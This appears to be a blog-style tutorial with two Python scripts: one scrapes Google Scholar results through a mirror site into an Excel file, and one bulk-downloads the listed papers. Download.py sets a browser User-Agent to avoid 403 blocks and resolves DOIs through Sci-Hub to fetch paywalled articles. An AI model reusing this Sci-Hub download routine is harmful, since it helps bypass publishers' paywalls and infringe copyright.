Scraping Google Scholar Literature Information and Downloading Papers

The project consists of two .py files.
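Judging from the import statements, the scripts rely on a handful of third-party packages (requests, beautifulsoup4, xlwt, xlrd and tqdm); presumably something like pip install requests beautifulsoup4 xlwt xlrd tqdm is enough to set them up, although the original post does not state the versions it was written against.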

The main script, Search&Download.py:

# -*- coding: utf-8 -*-

import requests
from bs4 import BeautifulSoup
from Download import Hubber
import xlwt,os
from time import sleep
from tqdm import tqdm


TotalNum=0
class Article(object):
    # Holds the information scraped for one search result
    title = ""
    article_link = ""
    authors = ""
    authors_link = ""
    journal = ""      # the "gs_a" line: authors, journal and year
    abstract = ""
    def __init__(self):
        self.title = "New Paper"

def save_xls(sheet, paper):
    # Write one paper per row into the Excel sheet, one field per column
    global TotalNum
    sheet.write(TotalNum, 0, TotalNum)
    sheet.write(TotalNum, 1, paper.title)
    sheet.write(TotalNum, 2, paper.article_link)
    sheet.write(TotalNum, 3, paper.journal)
    sheet.write(TotalNum, 4, paper.authors_link)
    sheet.write(TotalNum, 5, paper.abstract)
    TotalNum += 1

head = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'
        }  # Updated 2021-06-07: a browser User-Agent avoids HTTP 403 responses
article_titles = []
article_links = []

def GetInfo(sheet, url):
    # Fetch one page of search results and write every entry into the Excel sheet
    r = requests.get(url, headers=head)
    r.raise_for_status()
    r.encoding = r.apparent_encoding
    soup = BeautifulSoup(r.text, "html.parser")
    #print("\n"+soup)
    articles = soup.find_all(class_="gs_ri")
    for article in articles:
        paper = Article()
        try:
            title = article.find('h3')
            paper.title = title.text
            #print("\n"+paper.title)
            article_titles.append(paper.title)
            paper.article_link = title.a.get('href')
            #print("\n"+paper.article_link)
            article_links.append(paper.article_link)

            journal = article.find(class_="gs_a")
            paper.journal = journal.text
            #print("\n"+paper.journal)
            authors_addrs = journal.find_all('a')
            for authors_addr in authors_addrs:
                #print("\n"+authors_addr.get('href'))
                paper.authors_link = paper.authors_link + authors_addr.get('href') + "\n"

            abstract = article.find(class_="gs_rs")
            paper.abstract = abstract.text
            #print("\n"+paper.abstract)
        except Exception:
            # skip results that are missing a title, link or abstract
            continue
        save_xls(sheet, paper)
    return


def getArticle(article_titles, article_links):
    # Download every collected paper into .\Articles\<keyword>\
    dir = ".\\Articles\\" + keyword + "\\"
    #print (dir)
    if not os.path.exists(dir):
        os.makedirs(dir)    # makedirs also creates the parent .\Articles folder if needed
    for k in tqdm(range(len(article_titles))):
        # strip characters that are not allowed in Windows file names
        article_titles[k] = "{0}".format(article_titles[k].replace(':', ' ')).replace('.', '')
        path = dir + article_titles[k] + ".pdf"
        #print("\n"+path)
        try:
            Hubber.getPDF(article_links[k], path)
            sleep(0.5)
        except Exception:
            continue

if __name__ == '__main__':
    myxls = xlwt.Workbook()
    sheet1 = myxls.add_sheet(u'PaperInfo', True)
    column = ['No.', 'Title', 'Article link', 'Journal', 'Author links', 'Abstract']
    for i in range(0, len(column)):
        sheet1.write(TotalNum, i, column[i])
    TotalNum+=1

    keyword = input("Search keywords?\n")
    #keyword = diabetes and conjunctiva and (microcirculation or microvasculature)
    #print("\n"+keyword)
    key = keyword.replace(" ","+")
    info = keyword + "_PaperInfo.xls"

    print("\n"+"检索中……")
    if os.path.exists(info) == True:
        print("\n" + "PaperInfo already exists!")
    else:
        start = 0
        for i in tqdm(range(10)):  # first 10 result pages, i.e. up to 100 hits
            # the host below is a Google Scholar mirror; the query string follows Scholar's own format
            url = 'https://xs.dailyheadlines.cc/scholar?start=' + str(start) + '&q=' + key + '&hl=zh-CN&as_sdt=0,5'
            start = start + 10
            GetInfo(sheet1,url)
            myxls.save(keyword+'_PaperInfo.xls')
            sleep(0.5)
    print("\n"+"检索完成")

    print("\n"+"下载中……")
    if len(article_titles) != 0:
        getArticle(article_titles, article_links)
    else:
        import xlrd
        data = xlrd.open_workbook(info)
        table = data.sheet_by_index(0)
        article_titles = table.col_values(1)[1:]
        article_links = table.col_values(2)[1:]
        #print("\n"+article_titles)
        #print("\n"+article_links)
        getArticle(article_titles, article_links)
    print("\n"+ "下载完成")

The helper module, Download.py; more publisher sites can be added to it (a sketch of how follows the listing below):

import os.path
import re
import requests
from bs4 import BeautifulSoup

class Hubber:
    head = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'
        }  # Updated 2021-06-07: a browser User-Agent avoids HTTP 403 responses

    def pdf_hub(url, path):
        # Save a direct pdf link to disk
        try:
            pdf = requests.get(url, headers=Hubber.head)
            pdf.raise_for_status()    # otherwise an error page would be saved as a .pdf
            with open(path, "wb") as f:
                f.write(pdf.content)
            print("\n"+"pdf found directly!")
        except Exception:
            print("\n"+"failed to download pdf directly!\n" +url)
            Hubber.err_log(url)
    def sci_hub(path,doi):
        doi = str(doi).split("https://doi.org/")[1]
        url = "https://www.sci-hub.ren/doi:" + doi + "#"
        r = requests.get(url, headers=Hubber.head)
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        soup = BeautifulSoup(r.text, "html.parser")
        download_url = soup.iframe.attrs["src"]
        try:
            download_r = requests.get(download_url, headers=Hubber.head)
            download_r.raise_for_status()
            with open(path, "wb+") as temp:
                temp.write(download_r.content)
                print("\n"+"Article downloaded by doi!")
        except Exception:
            print("\n"+"failed to download pdf by doi!\n" +url)
            Hubber.err_log(url)

    def err_log(url):
        with open("download_err.txt", "a+", encoding="utf-8") as error:
            error.write("PDF not found,download link may be: \n"+url +"\n")

    def getSoup(url):
        r = requests.get(url, headers=Hubber.head)
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        soup = BeautifulSoup(r.text, "html.parser")
        return soup

    def getPDF(url,path):
        if os.path.exists(path):
            print("\n" + "Article already exists")
        else:
            if 'pdf' in url:
                print("\n" + 'already a direct pdf link!')
                Hubber.pdf_hub(url,path)
            elif re.match("https://www.sci-hub.ren/",url):
                print("\n" + 'sci_hub link!')
                url = str(url).replace("https://www.sci-hub.ren/","https://doi.org/")
                Hubber.sci_hub(path,url)
            #if pdf can be easily found!
            elif re.match("https://academic.oup.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link ="https://academic.oup.com"+soup.find(class_="al-link pdf article-pdfLink").get('href')
                #print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link,path)
                '''
                doi = soup.select('div[class="ww-citation-primary"]')[0].a.get('href')
                #print("\n"+doi)
                Hubber.sci_hub(path,doi)
                '''
            elif re.match("https://content.iospress.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link = soup.find(class_="btn btn-download btn-right get-pdf").get('href')
                # print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link, path)
            elif re.match("https://wwwnature.53yu.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link = soup.find(class_="c-pdf-download__link").get('href')
                #print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link, path)
            elif re.match("https://bjo.bmj.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link = soup.find(class_="article-pdf-download").get('href')
                pdf_link = "https://bjo.bmj.com" + pdf_link
                #print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link,path)
            elif re.match("https://jamanetwork.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link = soup.find(class_="toolbar-tool toolbar-pdf al-link pdfaccess").get('data-article-url')
                pdf_link = "https://jamanetwork.com" + pdf_link
                #print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link, path)

            #if pdf can't be easily found,but doi can!
            elif re.match("https://sciencedirect.53yu.com/", url):
                soup = Hubber.getSoup(url)
                doi = soup.find(class_="doi").get('href')
                Hubber.sci_hub(path, doi)
            elif re.match("https://diabetes.diabetesjournals.org/", url):
                soup = Hubber.getSoup(url)
                doi = soup.select('.citation-doi')[0].a.get('href')
                Hubber.sci_hub(path, doi)
            elif re.match("https://journals.lww.com/", url):
                soup = Hubber.getSoup(url)
                doi = "https://doi.org/" + str(soup.find(id="ej-journal-doi").text).split("doi: ")[1]
                Hubber.sci_hub(path, doi)
            else:
                '''
                https://europepmc.org/
                https://iovs.arvojournals.org/
                https://linkspringer.53yu.com/
                '''
                print("\n"+"To be prettified!Download link may be: " +"\n" +url)
                Hubber.err_log(url)

if __name__ == '__main__':
    url = "https://www.nature.com/articles/s41598-021-87315-7.pdf"
    url1 = "https://www.sci-hub.ren/doi:10.1067/mva.2003.139#"
    url2 = "https://www.sci-hub.ren/doi:10.1067/mva.2003.139#"
    Hubber.getPDF(url,"test.pdf")
    Hubber.getPDF(url1,"test1.pdf")
    Hubber.getPDF(url2,"test2.pdf")
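As noted above, Download.py is meant to grow: each publisher gets its own elif branch in Hubber.getPDF. One generic way to support a new site is to look for the <meta name="citation_pdf_url"> tag that many journal landing pages use to advertise their PDF. The helper below is only an illustrative sketch built on that idea; the function name get_pdf_from_meta is not part of the original post, and the tag is common but not universal.

# extend_download.py -- illustrative sketch only, not part of the original scripts
import requests
from bs4 import BeautifulSoup

def get_pdf_from_meta(url, path, head):
    # Resolve a journal landing page to its PDF via the citation_pdf_url meta tag, if present
    r = requests.get(url, headers=head)
    r.raise_for_status()
    soup = BeautifulSoup(r.text, "html.parser")
    meta = soup.find("meta", attrs={"name": "citation_pdf_url"})
    if meta is None:
        raise ValueError("no citation_pdf_url meta tag on " + url)
    pdf = requests.get(meta.get("content"), headers=head)
    pdf.raise_for_status()
    with open(path, "wb") as f:
        f.write(pdf.content)

Wiring it in would then be one more branch before the final else in Hubber.getPDF, for example elif re.match("https://some-new-journal.example/", url): get_pdf_from_meta(url, path, Hubber.head), with the real host substituted for the placeholder.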
